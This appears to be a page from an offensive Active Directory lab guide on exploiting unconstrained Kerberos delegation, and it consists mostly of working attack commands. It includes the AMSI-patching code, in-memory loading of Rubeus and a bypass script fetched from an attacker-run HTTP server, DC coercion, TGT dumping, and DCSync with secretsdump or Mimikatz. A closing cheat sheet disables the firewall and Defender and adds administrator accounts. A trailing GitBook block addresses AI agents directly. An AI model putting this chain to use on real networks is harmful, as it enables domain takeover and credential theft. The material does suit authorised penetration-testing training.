> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/delegations/unconstrain.md). # Unconstrain * To exploit an unconstrained delegation the simplest way is to do that from windows with Rubeus. * We launch an RDP connection on Bronx. * We got Fernando.Alonzo password's from the donPAPI dump * ``` xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80% /cert-ignore ``` From there we will bypass AMSI and launch Rubeus in memory * Prepare our server containing Rubeus.exe and our AMSI bypass. ``` python3 -m http.server 8080 ``` * On the RDP session bypass AMSI : amsi\_rmouse.txt contains the below commands ``` # Patching amsi.dll AmsiScanBuffer by rasta-mouse $Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } "@ Add-Type $Win32 $LoadLibrary = [Win32]::LoadLibrary("amsi.dll") $Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer") $p = 0 [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p) $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3) [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6) ``` Download Rebeus.exe to Parrot OS ``` wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe ``` Download the and execute amsi\_rmouse.txt to bypass AMSI ``` $x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344) (new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX ``` * Now launch Rubeus in memory with execute assembly. * First we will list the available tickets : ``` $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe') $assem = [System.Reflection.Assembly]::Load($data); [Rubeus.Program]::MainString("triage"); ```
* And now force a coerce of the DC NYC to the DC Bronx. 
Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local
* We look on the triage again : ``` [Rubeus.Program]::MainString("triage") ``` * And now the tgt of NYC is present
* To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly) ``` [Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap"); ```
* We now have the TGT of the domain controller * Let’s continue on linux to pass the ticket and launch dcsync with secretdump : * copy the ticket without space and return line (in vim i do : `:%s/\s*\n\s*//g`) * convert the ticket to ccache * use the kerberos ticket and launch secretdump ``` cat tgt.b64|base64 -d > ticket.kirbi ticketConverter.py ticket.kirbi ticket.ccache export KRB5CCNAME=/workspace/unconstrained/ticket.ccache secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC ```
Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on bonx and bypass the defender AV ``` powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1') https://github.com/SolomonSklash/RubeusToCcache rubeus.exe monitor /targetuser:nyc$ /interval:10 https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe SpoolSample.exe nyc bronx kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi lsadump::dcsync /domain:newyork.local /user:nyc$ [IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64")) https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919 kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi lsadump::dcsync /domain:newyork.local /user:nyc$ lsadump::lsa /domain:newyork.local /user:nyc$ lsadump::dcsync /user:krbtgt https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation CMD #Disable Firewall powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False netsh advfirewall set allprofiles state off powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False" Set-MpPreference -DisableRealtimeMonitoring $true #Change User Password via powershell administrator Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force) #Enable RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f #Create new user net user username password /ADD #To add a new user account to the domain: net user username password /ADD /DOMAIN #Add user to Admin Group net localgroup Administrators Tom /add ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://watchdogsacademy.gitbook.io/attacking-active-directory/delegations/unconstrain.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.